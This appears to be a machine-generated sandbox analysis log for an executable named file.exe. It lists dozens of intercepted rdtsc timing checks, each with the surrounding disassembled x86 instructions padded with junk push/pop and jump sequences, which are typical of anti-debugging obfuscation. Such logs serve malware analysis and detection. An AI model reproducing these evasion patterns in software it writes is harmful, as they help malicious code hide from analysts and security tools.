                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379252 second address: 1379256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379A10 second address: 1379A14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137CA88 second address: 137CA90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137DB7D second address: 137DB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E9E9 second address: 137E9ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137DB82 second address: 137DB8C instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFD80CCF02Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E9ED second address: 137E9F3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137FA51 second address: 137FA6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF035h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138099A second address: 13809CD instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFD80CDE8CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007EFD80CDE8E7h 0x00000011 pushad 0x00000012 jmp 00007EFD80CDE8D9h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137FC10 second address: 137FC16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137FC16 second address: 137FC24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13809CD second address: 13809FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov edi, dword ptr [ebp+122D2C12h] 0x0000000c push 00000000h 0x0000000e mov dword ptr [ebp+12470F59h], esi 0x00000014 push 00000000h 0x00000016 xor dword ptr [ebp+122D38F5h], ebx 0x0000001c xchg eax, esi 0x0000001d jmp 00007EFD80CCF02Ch 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13809FC second address: 1380A00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1380A00 second address: 1380A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1381ADE second address: 1381AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007EFD80CDE8C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1381AEE second address: 1381B06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF034h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1381B06 second address: 1381B0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1381B0C second address: 1381B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1380B6B second address: 1380B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1380B71 second address: 1380B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1380B77 second address: 1380B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1380B7B second address: 1380B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1382CBF second address: 1382CD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1383C2E second address: 1383CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007EFD80CCF034h 0x0000000c popad 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 sub dword ptr [ebp+122D1C82h], edx 0x00000017 mov di, bx 0x0000001a push 00000000h 0x0000001c jmp 00007EFD80CCF038h 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ecx 0x00000026 call 00007EFD80CCF028h 0x0000002b pop ecx 0x0000002c mov dword ptr [esp+04h], ecx 0x00000030 add dword ptr [esp+04h], 00000016h 0x00000038 inc ecx 0x00000039 push ecx 0x0000003a ret 0x0000003b pop ecx 0x0000003c ret 0x0000003d mov dword ptr [ebp+122D39F3h], ecx 0x00000043 xor edi, dword ptr [ebp+122D2C1Ah] 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jmp 00007EFD80CCF02Dh 0x00000052 jmp 00007EFD80CCF030h 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1383CBF second address: 1383CCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CDE8CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1384BE9 second address: 1384C79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF02Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jnp 00007EFD80CCF026h 0x00000013 pop edi 0x00000014 pop edx 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007EFD80CCF028h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 and edi, dword ptr [ebp+122D25AFh] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007EFD80CCF028h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 xor bl, FFFFFF97h 0x00000055 push 00000000h 0x00000057 jl 00007EFD80CCF034h 0x0000005d pushad 0x0000005e mov edi, dword ptr [ebp+122D29EAh] 0x00000064 or dword ptr [ebp+12454A5Ah], esi 0x0000006a popad 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007EFD80CCF02Bh 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1384C79 second address: 1384C7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1384C7D second address: 1384C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1384C83 second address: 1384C8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007EFD80CDE8C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1385BEA second address: 1385C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jp 00007EFD80CCF02Ch 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov bx, F572h 0x00000013 push 00000000h 0x00000015 add dword ptr [ebp+122D31A1h], ecx 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007EFD80CCF028h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 00000017h 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 push eax 0x00000038 mov di, 7F17h 0x0000003c pop ebx 0x0000003d xchg eax, esi 0x0000003e jnl 00007EFD80CCF041h 0x00000044 push eax 0x00000045 pushad 0x00000046 push esi 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1385C59 second address: 1385C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007EFD80CDE8C6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1385C66 second address: 1385C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1386E89 second address: 1386EB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f mov dword ptr [ebp+122D2D08h], esi 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 mov edi, dword ptr [ebp+122D294Ah] 0x0000001e pop edi 0x0000001f push eax 0x00000020 jc 00007EFD80CDE8CEh 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1387DC1 second address: 1387DD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CCF02Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1387DD1 second address: 1387DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1387FA7 second address: 1387FBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CCF032h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1384EB7 second address: 1384EBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138C426 second address: 138C42B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138C42B second address: 138C431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138C431 second address: 138C435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138B6FC second address: 138B703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138D4B0 second address: 138D4C2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFD80CCF026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138D4C2 second address: 138D4DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13964CF second address: 13964E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007EFD80CCF02Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13964E5 second address: 13964F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007EFD80CDE8C6h 0x00000009 jg 00007EFD80CDE8C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1395DD1 second address: 1395DE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF02Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1395DE3 second address: 1395DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007EFD80CDE8D3h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1396102 second address: 1396120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007EFD80CCF035h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1396120 second address: 139612E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007EFD80CDE8D2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139612E second address: 1396134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1398C3F second address: 1398C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1398C4A second address: 1398C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1398C4E second address: 1398C54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1398C54 second address: 1398C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push edi 0x00000009 jmp 00007EFD80CCF02Ch 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1398C70 second address: 1398C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1398C74 second address: 1398C96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF037h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139C931 second address: 139C935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139CA8E second address: 139CA98 instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFD80CCF026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139CA98 second address: 11C1D57 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFD80CDE8CCh 0x00000008 jbe 00007EFD80CDE8C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 cld 0x00000012 push dword ptr [ebp+122D02F5h] 0x00000018 ja 00007EFD80CDE8D2h 0x0000001e call dword ptr [ebp+122D21C2h] 0x00000024 pushad 0x00000025 pushad 0x00000026 call 00007EFD80CDE8D9h 0x0000002b push ecx 0x0000002c pop eax 0x0000002d pop ebx 0x0000002e jmp 00007EFD80CDE8D0h 0x00000033 popad 0x00000034 xor eax, eax 0x00000036 mov dword ptr [ebp+122D2D08h], edx 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 jmp 00007EFD80CDE8D6h 0x00000045 mov dword ptr [ebp+122D2B3Eh], eax 0x0000004b jmp 00007EFD80CDE8D3h 0x00000050 mov esi, 0000003Ch 0x00000055 add dword ptr [ebp+122D2D08h], eax 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f sub dword ptr [ebp+122D2CECh], ebx 0x00000065 lodsw 0x00000067 or dword ptr [ebp+122D3035h], edx 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 sub dword ptr [ebp+122D24D1h], ecx 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b stc 0x0000007c nop 0x0000007d push ebx 0x0000007e push eax 0x0000007f push edx 0x00000080 jp 00007EFD80CDE8C6h 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139F931 second address: 139F956 instructions: 0x00000000 rdtsc 0x00000002 jne 00007EFD80CCF02Eh 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007EFD80CCF026h 0x00000011 pop edi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 js 00007EFD80CCF051h 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A4A16 second address: 13A4A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A4A1F second address: 13A4A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A4A23 second address: 13A4A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A3D1A second address: 13A3D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007EFD80CCF026h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A3E6F second address: 13A3E73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A3E73 second address: 13A3E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007EFD80CCF026h 0x0000000e jnl 00007EFD80CCF026h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A3E87 second address: 13A3E8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A4007 second address: 13A400B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A400B second address: 13A4029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jng 00007EFD80CDE8C6h 0x00000011 jbe 00007EFD80CDE8C6h 0x00000017 jp 00007EFD80CDE8C6h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A4029 second address: 13A4040 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jp 00007EFD80CCF026h 0x0000000b jno 00007EFD80CCF026h 0x00000011 popad 0x00000012 push edi 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A45B6 second address: 13A45CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A4754 second address: 13A475A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A475A second address: 13A4764 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFD80CDE8C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A4764 second address: 13A479F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFD80CCF02Fh 0x0000000b jmp 00007EFD80CCF034h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007EFD80CCF02Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A6045 second address: 13A6055 instructions: 0x00000000 rdtsc 0x00000002 js 00007EFD80CDE8C6h 0x00000008 jns 00007EFD80CDE8C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A6055 second address: 13A605A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A8C97 second address: 13A8CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CDE8D6h 0x00000009 pop ebx 0x0000000a js 00007EFD80CDE8CCh 0x00000010 je 00007EFD80CDE8C6h 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AD0F1 second address: 13AD0F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AD0F8 second address: 13AD109 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFD80CDE8C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AD109 second address: 13AD112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AD112 second address: 13AD131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D4h 0x00000007 pushad 0x00000008 js 00007EFD80CDE8C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13ADE78 second address: 13ADE7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13ADE7C second address: 13ADE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13ADE82 second address: 13ADE87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13ADFCD second address: 13ADFD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13ADFD2 second address: 13ADFD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13ADFD8 second address: 13ADFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CDE8CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13B2EC1 second address: 13B2EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
